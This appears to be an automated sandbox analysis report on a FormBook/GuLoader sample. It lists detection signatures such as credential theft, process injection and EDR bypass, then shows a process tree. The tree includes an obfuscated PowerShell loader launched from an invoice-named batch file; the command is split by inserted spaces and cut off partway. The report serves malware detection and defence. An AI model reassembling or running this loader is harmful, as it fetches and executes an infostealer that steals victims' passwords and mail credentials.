Analysis Report
General Information
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Malicious sample detected (through community Yara rule)
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Obfuscated command line found
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
- System is w10x64
cmd.exe (PID: 4204 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\rFV-4 52747284IN .bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 1408 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 4324 cmdline:
powershell .exe -wind owstyle hi dden "cls; write 'Dec isionen La ndbrugsmss iges Sapre mia157 Tan demcykels nucleli Is opropenyl Albatroser ne Granden Udbredes Fluesnappe ren Sidelo ebende Ern estines Ka rakterbris ternes Unp rejudice U dsigelsen Moonward H ovedbanega arde Frems kridtsbyer ne Sildigs te Readapt able Rendy rkede Oppr obriated P rotococcal Hjlpefunk tioners De cisionen L andbrugsms siges Sapr emia157 Ta ndemcykels nucleli I sopropenyl Albatrose rne Grande n Udbredes Fluesnapp eren Sidel oebende Er nestines K arakterbri sternes Un prejudice Udsigelsen Moonward Hovedbaneg aarde Frem skridtsbye rne Sildig ste Readap table Rend yrkede Opp robriated Protococca l Hjlpefun ktioners'; If (${host }.CurrentC ulture) {$ Cabalismsb ryderens++ ;}Function Antikvite tsforretni ngs($Rodfu nktionerne ){$Byggefo retagender s156=$Rodf unktionern e.Length-$ Cabalismsb ryderens;$ Sinecural= 'SUBsTR';$ Sinecural+ ='ing';For ( $Cabalis m=4;$Cabal ism -lt $B yggeforeta genders156 ;$Cabalism +=5){$Deci sionen+=$R odfunktion erne.$Sine cural.Invo ke( $Cabal ism, $Caba lismsbryde rens);}$De cisionen;} function U nthrust($M eagrely){ . ($E ksperter) ($Meagrely );}$Antoni nas=Antikv itetsforre tnings 'Di ttMCineofu tizantiisa mmlCarblMo rpaudny/Il li5fa g.Ch ec0Subc .u l(UbehW Ae ,istrinCon vd HanoFr kwNyvlsDia t EmbrNToc oT Gli Con v1 ,dd0Kli p.Sena0Bal d; S h For eWR,triRe, ongenn6S,o l4 Opt;.av i Strx,erm 6Mod,4Stal ; Far Bagl rOstevSla, :Inqi1akti 2 Fed1.mrk . g,t0,esk )Kamg DebG Natie,atrc skank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0 .ini1atla0 Ek,k1,nth UdliFTizwi CadirAlome Genaf,oreo egesxA,at/ Omr.1ma,d2 Vol 1 Unr. Fort0Home ';$Torumsl ejligheds= Antikvitet sforretnin gs 'BigwU Py,sBabbeV armrDisp-F oreA LaggL utheLysenO .detEl,n ' ;$nucleli= Antikvitet sforretnin gs 'Fa,ah nkatDe otF e.lp,borsI nhi:No p/S pek/AageeB uescSidsoP syknOnd,s CuttNipsr EriaResem. tyreHybrdF eroi aanaO ve .denacJ agaoNondm Ku /UndeT. ncoe.ortgO ut,lSinubH valrClavnH illdEmpoe OddrEnkeiF anteDelerS ail.FervsS crinS enpC re ';$Uda rte=Antikv itetsforre tnings 'Hy tt>Sony '; $Eksperter =Antikvite tsforretni ngs 'Gutti Virke,trex Scor ';$Ar abin='Gran den';$Mart inetishnes s = Antikv itetsforre tnings 'Va nde H.wcAa behroeroUd tr Dec%S,l da B,upReg ,pOv,rd Ek .aProvtD.c oaDung%Cav i\,uviCkon toPreduKon sm niaAut rA bea F r tUnheeWelf . autBBe.a iD bbcAl m Sta&Mask& ual heale Ti.c Pl,h Vippo Biv SynttL uc ';Unthrust (Antikvit etsforretn ings 'Maxi $Em,og .nc l B bSlutaInte l Pol:It,m M,opeeDru. tBegialend l OstiTelt sSkrumSwad = Oms(Relo c.sonmAnte dFore Sage /EmbacZibe Efte$Depr MP,ntaUdfr rB,sittiss iZircnTu.s ePosstSkov i sa sMass hU.banDesi ePertsHimm